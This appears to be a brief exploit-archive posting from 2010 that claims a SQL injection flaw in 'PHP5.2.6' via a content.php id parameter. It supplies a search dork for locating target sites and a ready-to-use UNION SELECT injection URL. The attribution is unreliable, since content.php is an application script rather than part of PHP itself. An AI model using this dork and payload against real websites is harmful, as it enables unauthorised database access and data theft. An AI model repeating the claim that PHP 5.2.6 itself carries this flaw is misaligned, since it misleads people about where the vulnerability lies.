id: 13563
date: 08/03/2010
title: PHP5.2.6 (content.phpid) SQL Injection Vulnerability
author: Amine_92
cves: 

====================================================
PHP5.2.6 (content.phpid) SQL Injection Vulnerability
====================================================


Author : Amine_92
home : http://vbhacker.net/
Dork : "Powered by PHP/5.2.6"
Download Page : http://www.php.net/releases/5_2_6.php/
 
########################################################################################
  
Sql Injection:
http://localhost/content.php?id=114
 
xpl :
 
http://localhost/content.php?id=-114+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
 
########################################################################################
Thanks All Hacker Mu$lim & Poeple Of Gaza
########################################################################################



#  0day.today [2023-03-22]  #